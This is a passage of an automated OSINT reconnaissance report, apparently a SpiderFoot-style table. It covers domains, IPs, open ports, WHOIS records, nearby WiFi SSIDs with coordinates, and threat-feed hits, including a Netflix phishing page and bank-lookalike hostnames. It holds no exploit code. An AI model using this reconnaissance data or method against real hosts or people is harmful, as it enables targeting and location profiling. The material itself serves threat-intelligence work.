u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': | 185.199.111.153 |
| 2023-05-12 03:23:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.17:8080 | 188.114.96.0/24 |
| 2023-05-12 02:45:56 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 4 | 0 | None | {u'city': u'Ashburn', u'security': {u'is_vpn': False}, u'city_geoname_id': 4744870, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'AMAZON-AES', u'isp_name': u'Amazon.com, Inc.', u'organization_name': u'Amazon Technologies Inc', u'autonomous_system_number': 14618}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20149', u'longitude': -77.4903, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:45:55'}, u'latitude': 39.0469, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2600:1f18:2489:8201::c8', u'continent': u'North America', u'region_iso_code': u'VA'} | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | UnitedStatesOfSmash (Net ID: F8:F5:32:A5:DE:80) | 37.751, -97.822 |
| 2023-05-12 03:04:11 | Malicious Co-Hosted Site | Yes | abuse.ch | 0 | 1 | 2 | 0 | None | abuse.ch URLhaus (Domain) [www.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | www.github.com |
| 2023-05-12 02:54:20 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | nuke.battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NH-NEW (Net ID: 00:01:21:31:EF:16) | 37.7642, -122.3993 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:0C:41:F9:92:AD) | 39.0469, -77.4903 |
| 2023-05-12 02:53:45 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8002::153:80 | 2606:50c0:8002::153 |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ahu.xyz | ayhu.xyz |
| 2023-05-12 02:54:10 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c570c285af722f3-ORD
Content-Encoding: gzip
| 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myjoey (Net ID: 00:0C:41:D4:C9:9B) | 39.0469, -77.4903 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DTLAMN5 (Net ID: 00:01:9F:20:3C:A4) | 34.0544, -118.244 |
| 2023-05-12 02:46:23 | Netblock Membership | No | RIPE | 8 | 0 | 2 | 0 | None | 185.199.108.0/24 | 185.199.108.153 |
| 2023-05-12 03:11:22 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60313, Germany, Europe | 207.154.228.169 |
| 2023-05-12 03:09:26 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 | 188.114.96.1 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007ayong.github.io]
https://www.openphish.com/feed.txt | 007ayong.github.io |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/withat_4.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:45:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://reitzcr7.github.io/Netflix', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://reitzcr7.github.io/Netflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_8c4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2244"\n "IsoScope_8c4_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "IsoScope_8c4_IE_EarlyTabStart_0xee0_Mutex"\n "IsoScope_8c4_ConnHashTable<2244>_HashTable_Mutex"\n "IsoScope_8c4_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_8c4_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "104.18.22.52:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"pro.fontawesome.com"\n "reitzcr7.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002244]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF1FD7FCE8C43D8B2E.TMP" has type "data"- Location: [%TEMP%\\~DF1FD7FCE8C43D8B2E.TMP]- [targetUID: 00000000-00002244]\n "~DF18D68D2B5B79E841.TMP" has type "data"- Location: [%TEMP%\\~DF18D68D2B5B79E841.TMP]- [targetUID: 00000000-00002244]\n "~DF53073A91A8898689.TMP" has type "data"- Location: [%TEMP%\\~DF53073A91A8898689.TMP]- [targetUID: 00000000-00002244]\n "~DFAC4CE31C0DB4071A.TMP" has type "data"- Location: [%TEMP%\\~DFAC4CE31C0DB4071A.TMP]- [targetUID: 00000000-00002244]\n "urlref_httpsreitzcr7.github.ioNetflix" has type "HTML document ASCII text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "RecoveryStore._DEC7D8E1-EF98-11ED-B516-080027C3EB44_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_DEC7D8E3-EF98-11ED-B516-080027C3EB44_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_E73374D0-EF98-11ED-B516-080027C3EB44_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "HV132DPC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HV132DPC.txt]- [targetUID: 00000000-00003008]\n "902T7L58.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\902T7L58.txt]- [targetUID: 00000000-00002244]\n "PEFIWE8M.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PEFIWE8M.txt]- [targetUID: 00000000-00002244]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "I87RSVNQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I87RSVNQ.txt]- [targetUID: 00000000-00003008]\n "1RRO92P8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1RRO92P8.txt]- [targetUID: 00000000-00002244]\n "NZ1UVLXU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NZ1UVLXU.txt]- [targetUID: 00000000-00002244]\n "59QBRUWU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\59QBRUWU.txt]- [targetUID: 00000000-00002244]\n "Netflix_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://reitzcr7.github.io/Netflix/"\n Pattern match: "https://reitzcr7.github.io"\n Pattern match: "https://reitzcr7.github.io/Netflix"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "mzjdL.VS/oLORCm/~H.c0KNw&FGk~Z2C3[f"\n Pattern match: "www.microsoft.com/pkiops/certs/Microsoft%20Azure%20TLS%20Issuing%20CA%2002%20-%20xsign.crt0-!http://oneocsp.microsoft.com/ocsp05E9R"\n Pattern match: "https://pro.fontawesome.com/releases/v5.10.0/css/all.css"\n Pattern match: "SUIDmicrosoft.com/921656687628831032347376965971631032229MUID27087E39A60367C91FAC6D37A74F66C3microsoft.com/102569936550431110701376981596631032229_EDGE_Vmicrosoft.com/921669936550431110701376981596631032229SRCHDAF=NOFORMmicrosoft.com/1024332378944031085610"\n Pattern match: "SUIDmicrosoft.com/921656687628831032347376965971631032229MUID27087E39A60367C91FAC6D37A74F66C3microsoft.com/102569936550431110701376981596631032229SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD"\n Pattern match: "SUIDmicrosoft.com/921656687628831032347376965971631032229SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mic"\n Pattern match: "921670936550431110701377340971631032229MUID2090FF0873546C472F98EC0672D06DA8msn.com/102570936550431110701377340971631032229"\n Pattern match: "MUIDB27087E39A60367C91FAC6D37A74F66C3ieonline.microsoft.com/921669936550431110701376981596631032229"\n Pattern match: "isdomainmigratedtrue | 185.199.111.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip Wavelan (Net ID: 00:02:2D:01:79:94) | 37.780462,-122.390564 |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 2 | 0 | None | United States | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:44:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | github.com | github.com |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-th.github.io | 185.199.111.153 |
| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | zlib@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": 